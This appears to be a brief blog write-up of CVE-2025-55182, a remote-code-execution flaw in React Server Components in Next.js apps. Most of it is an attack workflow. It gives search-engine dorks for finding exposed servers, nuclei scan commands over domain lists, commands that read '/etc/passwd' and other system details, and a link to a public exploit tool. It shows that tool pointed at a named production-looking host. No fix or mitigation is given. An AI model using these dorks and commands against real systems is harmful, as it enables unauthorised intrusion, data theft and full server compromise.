Analyzing CVE-2025–55182: React Server Components RCE in Next.js Applications

Summary

React2Shell (CVE-2025–55182) is a critical Remote Code Execution (RCE) vulnerability affecting applications that use React Server Components (RSC) commonly deployed in Next.js environments. The flaw arises from unsafe deserialization and command execution paths in RSC request handling allowing attackers to execute arbitrary system commands on the server.

Severity: Critical Attack Vector: Remote (Unauthenticated in many cases) Impact: Full server compromise Affected Stack: React Server Components / Next.js

Search Engine Dorks

Shodan

http.component:"next.js,react"
http.component:"Next.js"
None

ZoomEye

http.body="react.production.min.js"
http.body="React.createElement("
app="React Router"

FOFA

app="NEXT.JS"
app="React.js"

Detection & Validation

Automated Scanning

Nuclei Template (Official):

https://cloud.projectdiscovery.io/library/CVE-2025-55182
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-55182.yaml

echo domain.com | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-55182.yaml
cat domains.txt | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-55182.yaml
None

Browser-Based

RSC Detector Extension

https://github.com/mrknow001/RSC_Detector

----Command
cat /etc/passwd
ls -la
uname -a
id
None

Tools

https://github.com/Chocapikk/CVE-2025-55182
python3 exploit.py -u https://prod-daash.ryvalx.com -c "id"
None

Impact

Successful exploitation allows an attacker to:

  • Execute arbitrary OS commands
  • Read sensitive files (environment variables, secrets)
  • Pivot laterally inside infrastructure
  • Achieve full application takeover
  • Potentially compromise CI/CD pipelines

Business Impact:

  • Data breaches
  • Credential exposure
  • Supply chain compromise
  • Complete loss of application integrity